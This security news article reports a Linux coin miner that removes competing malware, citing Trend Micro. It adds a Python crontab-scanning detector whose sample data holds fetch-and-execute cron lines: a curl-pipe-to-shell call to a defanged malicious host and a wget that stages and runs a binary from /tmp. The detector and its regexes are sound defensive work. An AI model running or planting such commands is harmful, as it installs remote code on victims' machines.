Thursday, May 22, 2025

New Linux Coin Miner that Deletes Other Linux Malware and Coin Miners


A new Linux coin miner has been found that deletes previously installed Linux malware and coin miners, together with their associated services and the connection ports they use.

Security researchers from Trend Micro observed the new coin miner and found that its scripts match features of Xbash and KORKERDS.

“Noticing the script downloading the binary, we also looked at an analyzed code of KORKERDS modified and collected in November 2018 and found them almost the same except for a few additions and notable omissions.”

Linux coin miner

The new miner does not remove the security products on the system; instead, it kills the components of the malware from which the script was copied.

The payload is a modified version of the cryptocurrency miner XMR-Stak, which supports CPUs as well as AMD and NVIDIA GPUs, for Cryptonight currencies. The infection starts with an IP camera to which the attacker tries to upload a crontab file.

Researchers found that the malware performs the following three functions.

  • Function B kills previously installed malware
  • Function D downloads the coin miner
  • Function C downloads a script from hxxp://yxarsh[.]shop/0 that creates a crontab entry and calls the script at 1 am.

The miner is capable of implanting itself in the system root to survive reboots.

“We noted the subtle difference in the absence of the link placed in between the PUT URL /fileserver/vMROB4ZhfLTljleL and the actual crontab. While KORKERDS saves the crontab directly, the new script inserts just one crontab that fetches all the code and the miner,” reads the Trend Micro report.
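The persistence described above comes down to a single cron entry that fetches remote code and runs it. A defender can hunt for that pattern by scanning crontab contents for fetch-and-execute commands. The following script is an added example written for this article, not code from Trend Micro's report or from the malware; the crontab lines it scans are constructed (the defanged URL is the one printed above, the 203.0.113.10 address is a documentation-range placeholder), and the detection regexes are an illustrative heuristic, not a signature for this specific sample.

```python
"""Flag crontab entries that download remote content and execute it."""
import re
from dataclasses import dataclass, field

# Constructed sample crontab for demonstration; not taken from any real host.
# Line 2 is benign, line 3 mirrors the single "fetch everything" cron entry
# the article describes, line 4 is a variant that stages the payload in /tmp.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
30 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
0 1 * * * curl -fsSL hxxp://yxarsh[.]shop/0 | sh
*/10 * * * * wget -q -O /tmp/.x http://203.0.113.10/x && chmod +x /tmp/.x && /tmp/.x
@reboot /usr/bin/node /opt/app/server.js
"""

DOWNLOADER_RE = re.compile(r"\b(curl|wget|fetch)\b")
URL_RE = re.compile(r"\b(?:https?|hxxps?|ftp)://\S+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da|z|k)?sh\b")
TMP_PATH_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/\S+")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def split_entry(line):
    """Return (schedule, command), or None for blank, comment and VAR=value lines.

    Handles both the five-field user crontab format and @reboot-style entries.
    System crontab lines (/etc/crontab) carry an extra user field, which ends
    up at the start of the command; the heuristics below still apply to it.
    """
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):
        parts = s.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = s.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def scan_crontab(text):
    """Return a Finding for every entry that fetches remote code and runs it."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, cmd = entry
        fetches = bool(DOWNLOADER_RE.search(cmd) and URL_RE.search(cmd))
        reasons = []
        if fetches:
            reasons.append("downloads from a remote URL")
        if PIPE_TO_SHELL_RE.search(cmd):
            reasons.append("pipes fetched content into a shell")
        if fetches and TMP_PATH_RE.search(cmd) and "&&" in cmd:
            reasons.append("stages payload in a world-writable directory and executes it")
        if reasons:
            findings.append(Finding(line_no, schedule, cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.schedule}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Run it against the real files (`/etc/crontab`, `/etc/cron.d/*`, `/var/spool/cron/crontabs/*`) rather than the embedded sample, and treat any hit as a lead to investigate, since legitimate automation can also fetch scripts; the point is that the single-entry persistence the article describes is easy to enumerate once you look for downloader-plus-execute combinations in scheduled tasks.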


Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
